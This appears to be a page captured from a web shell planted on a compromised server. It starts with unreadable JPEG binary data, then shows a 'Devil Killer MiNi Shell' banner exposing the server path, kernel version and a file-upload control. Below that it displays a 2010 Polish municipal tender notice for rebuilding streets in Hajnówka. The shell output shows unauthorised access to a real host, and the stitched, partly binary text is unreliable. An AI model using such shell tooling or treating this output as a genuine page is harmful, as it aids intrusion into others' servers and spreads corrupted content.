JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100813/250114-N-2010.html

<p class="kh_header"><b>Hajnówka: Przebudowa  ulic  miejskich  w  Hajnówce</b><br>
<b>Numer ogłoszenia: 250114 - 2010; data zamieszczenia: 13.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Hajnówka , ul. A. Zina 1, 17-200 Hajnówka, woj. podlaskie, tel. 085 6822875, faks 085 6822994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hajnowka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.hajnowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  ulic  miejskich  w  Hajnówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  realizacja  zadania  pn: Przebudowa  ulic  miejskich   w  Hajnówce polegająca  na:

1. Przebudowie  ul. Bez  nazwy  i  dojazdu  do  wieży  ciśnień  w  Hajnówce  o  łącznej  długości  
    574,31 m  i  szerokości  jezdni  od  2,25 m  do  5,0 m.       
2. Przebudowie  ul. Jakuba  Kołasa  w  Hajnówce  o  długości  232,88 m  i  szerokości  jezdni  od 
    5,0 m  do  5,50 m.   
3. Przebudowie  ul. Topolowej  w  Hajnówce  o  długości  186,13 m  i  szerokości  jezdni  3,00 m.   
4. Przebudowie  ul. Spiralnej  w  Hajnówce  o  długości  210,35 m  i  szerokości  jezdni  od  3,00 m  
    do  5,00 m.   

Zamawiający  dopuszcza  możliwość  składania  ofert  częściowych  na  poszczególne  zadania.   

Zadanie  Nr 1 :
                          Wykonanie  kanalizacji  deszczowej:
a. ul. Bez  nazwy  i  dojazd  do  wieży  ciśnień :
    -  kanał  z  rur  PCV  o  średnicy  zewnętrznej  O 250 mm                 -    262 mb,
    -  kanał  z  rur  PCV  o  średnicy  zewnętrznej  O 200 mm                 -    178 mb,
    -  studnie  rewizyjne  z  kręgów  betonowych  O 1200 mm                -      12 kpl.   
    -  studzienki  ściekowe  uliczne  O 500 mm  z  osadnikiem                -      15 szt.       


b. ul. Jakuba  Kołasa :
    -  kanał  z  rur  PCV  o  średnicy  zewnętrznej  O 200 mm                 -       40 mb,
    -  przykanaliki  z  rur  PCV  o  średnicy  zewnętrznej  O 200 mm      -       21 mb,
    -  studnie  rewizyjne  z  kręgów  betonowych  O 1200 mm                -         1 kpl.   
    -  studzienki  ściekowe  uliczne  O 500 mm  z  osadnikiem                -         7 szt.       

Zadanie  Nr 2 :
                          Wykonanie  robót  ziemnych  i  podbudowy  oraz  nawierzchni  utwardzonej  jezdni  z  mieszanki  mineralno - bitumicznej  asfaltowej:
a. ul. Bez  nazwy  i  dojazd  do  wieży  ciśnień :
    - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
      ścieralna)  na  łącznej  powierzchni  2 806,00 m2  wraz  z  mechanicznym  wyprofilowaniem               
      i  dogęszczeniem  do  gr. 20 cm  podbudowy  z  pospółki  wykonanej  przez  Zamawiającego. 
b. ul. Jakuba  Kołasa :
    - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 3 cm (warstwa  
      wyrównawcza)  na  łącznej  powierzchni  753,00 m2.
    - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
      ścieralna)  na  łącznej  powierzchni  753,00 m2.
    - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
      ścieralna)  na  łącznej  powierzchni  541,68 m2  wraz  z  mechanicznym  wyprofilowaniem               
      i  dogęszczeniem  do  gr. 20 cm  podbudowy  z  pospółki  wykonanej  przez  Zamawiającego. 
c. ul. Topolowa :
    - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
      ścieralna)  na  powierzchni  566,39 m2  wraz  z  mechanicznym  wyprofilowaniem               
      i  dogęszczeniem  do  gr. 20 cm  podbudowy  z  pospółki  wykonanej  przez  Zamawiającego. 
    - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 9 cm (warstwa  
      wiążąca)  na  powierzchni  13,00 m2.  
    - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
      ścieralna)  na  powierzchni  13,00 m2  
d. ul. Spiralna :
    - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
      ścieralna)  na  powierzchni  950 m2  wraz  z  mechanicznym  wyprofilowaniem               
      i  dogęszczeniem  do  gr. 20 cm  podbudowy  z  pospółki  wykonanej  przez  Zamawiającego. 

Zadanie  Nr 3 :
                          Przebudowa  istniejących  urządzeń  telekomunikacyjnych :
a. ul. Bez  nazwy  i  dojazd  do  wieży  ciśnień :
    -  montaż  i  ustawienie  słupów  pojedynczych  żelbetowych    -      2 szt.
    -  montaż  i  ustawienie  słupów  bliźniaczych  żelbetowych      -      1 szt.
    -  zawieszenie  kabli  nadziemnych                                             -   361 mb..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-2, 45.23.32.22-1, 45.31.40.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie  żąda  wniesienia  wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za  spełnienie  warunku  zamawiający  uzna  wykonanie  w  okresie  ostatnich  pięciu  lat  
           przed  upływem  terminu  składania  ofert, a  jeżeli  okres  prowadzenia  działalności  jest  
           krótszy - w tym  okresie, dwóch  robót  budowlanych  w  zakresie  budowy  lub  przebudowy  
           dróg/budowy  lub  przebudowy  kanalizacji  deszczowej  lub  sanitarnej  odpowiadających  
           swoim  rodzajem  i  wartością  robotom  budowlanym  stanowiącym  przedmiot  zamówienia  
           wraz  załączeniem  dokumentów  potwierdzających, że  roboty  te  zostały  wykonane  
           zgodnie  z  zasadami  sztuki  budowlanej  i  prawidłowo  ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
    Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  winien  dysponować  osobami, które  będą  uczestniczyć  w  wykonywaniu 
    zamówienia  legitymujące  się  kwalifikacjami  zawodowymi, doświadczeniem                  
    i  wykształceniem  odpowiednimi  do  stanowisk  jakie  im  zostaną  powierzone  -                      
    zgodnie  z  poniższym  wykazem :
                -  Kierownik  Budowy   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  drogowej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                             uzyskania  uprawnień,
                -  Kierownik  Robót  w  branży  drogowej   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  drogowej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                             uzyskania  uprawnień,                                       
                -  Kierownik  Robót  w  branży  sanitarnej   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  sanitarnej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                             uzyskania  uprawnień,
                -  Kierownik  Robót  w  branży  telekomunikacyjnej   -  1 osoba : 
                                                         - uprawnienia  budowlane  do  kierowania  robotami    
                                                            w  specjalności  sanitarnej  lub  odpowiadające  im 
                                                            uprawnienia  wydane  na  podstawie  wcześniej 
                                                            obowiązujących  przepisów,
                                                         -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                             uzyskania  uprawnień,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Niezwłocznie  po  wyborze  najkorzystniejszej  oferty  Zamawiający  jednocześnie  zawiadomi  
    Wykonawców, którzy  złożyli  oferty, o:
    a. wyborze  najkorzystniejszej  oferty, podając  nazwę (firmę), siedzibę  i  adres  Wykonawcy, 
        którego  ofertę  wybrano  wraz  z  uzasadnieniem  jej  wyboru  oraz  nazwy (firmy), siedziby     
        i  adresy  Wykonawców, którzy  złożyli  oferty  wraz  z  punktacją  przyznaną  ofertom          
        w  każdym  kryterium  oceny  ofert  i  łączną  punktację, 
    b. Wykonawcach, których  oferty zostały odrzucone, podając  uzasadnienie  faktyczne i prawne,
    c. Wykonawcach, którzy  zostali  wykluczeni  z  postępowania  o  udzielenie  zamówienia,  
        podając  uzasadnienie  faktyczne  i  prawne,
    d. terminie, określonym  zgodnie  z  art. 94 ust. 1 lub 2, po  którego  upływie  umowa  w  sprawie 
        zamówienia  publicznego  może  być  zawarta,
2. Niezwłocznie  po  wyborze  najkorzystniejszej  oferty  Zamawiający  zamieszcza  informacje,     
    o  których  mowa  w  pkt. 1  lit. a, na  stronie  internetowej  oraz  w  miejscu  publicznie  
    dostępnym  w  swojej  siedzibie.
3. Wykonawca, którego  oferta  zostanie  uznana  za  najkorzystniejszą  przed  zawarciem  umowy  
    jest  zobowiązany  do :
    a. wniesienia  zabezpieczenia  należytego  wykonania  umowy,
    b. przedłożenia  umowy  regulującej  współpracę  Wykonawców  wspólnie  ubiegających  się       
        o  udzielenie  zamówienia,
    c. złożenia  informacji  o  osobach  prawnie  umocowanych  do  zawarcia  umowy  i  okazania  
        pełnomocnictwa  o  ile  taka  konieczność  zaistnieje,
4. Wybranemu  wykonawcy  Zamawiający  określi miejsce  i  termin  podpisania  umowy.
5. Jeżeli  Wykonawca, którego  oferta  została  wybrana, uchyla  się  od  zawarcia  umowy              
    w  sprawie  zamówienia  publicznego  lub  nie  wnosi  wymaganego  zabezpieczenia  należytego  
    wykonania  umowy, Zamawiający  wybiera  ofertę  najkorzystniejszą  spośród  pozostałych  
    ofert, bez  przeprowadzania  ich  ponownego  badania  i  oceny  chyba, że  zachodzą  przesłanki  
    unieważnienia  postępowania, o  których  mowa  w  art. 93  ust. 1  ustawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hajnowka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1,
tel. 85  682 2875, 682 6443
fax. 85 682 2994.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2010 godzina 10:00, miejsce: Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1,
                                                 pok. Nr  219  -  sekretariat  Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa  ulic  miejskich  w  Hajnówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  Nr 1 :
                                Wykonanie  kanalizacji  deszczowej:
     a. ul. Bez  nazwy  i  dojazd  do  wieży  ciśnień :
         -  kanał  z  rur  PCV  o  średnicy  zewnętrznej  O 250 mm                 -    262 mb,
         -  kanał  z  rur  PCV  o  średnicy  zewnętrznej  O 200 mm                 -    178 mb,
         -  studnie  rewizyjne  z  kręgów  betonowych  O 1200 mm                -      12 kpl.   
         -  studzienki  ściekowe  uliczne  O 500 mm  z  osadnikiem                -      15 szt.       

     b. ul. Jakuba  Kołasa :
         -  kanał  z  rur  PCV  o  średnicy  zewnętrznej  O 200 mm                 -       40 mb,
         -  przykanaliki  z  rur  PCV  o  średnicy  zewnętrznej  O 200 mm      -       21 mb,
         -  studnie  rewizyjne  z  kręgów  betonowych  O 1200 mm                -         1 kpl.   
         -  studzienki  ściekowe  uliczne  O 500 mm  z  osadnikiem                -         7 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-2, 45.23.32.22-1, 45.31.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa  ulic  miejskich                
      w  Hajnówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  Nr 2 :
                              Wykonanie  robót  ziemnych  i  podbudowy  oraz  nawierzchni  utwardzonej   
     jezdni  z  mieszanki  mineralno - bitumicznej  asfaltowej:
     a. ul. Bez  nazwy  i  dojazd  do  wieży  ciśnień :
         - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
           ścieralna)  na  łącznej  powierzchni  2 806,00 m2  wraz  z  mechanicznym  wyprofilowaniem               
           i dogęszczeniem  do  gr. 20 cm  podbudowy  z  pospółki  wykonanej  przez  Zamawiającego. 
     b. ul. Jakuba  Kołasa :
         - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 3 cm (warstwa  
           wyrównawcza)  na  łącznej  powierzchni  753,00 m2.
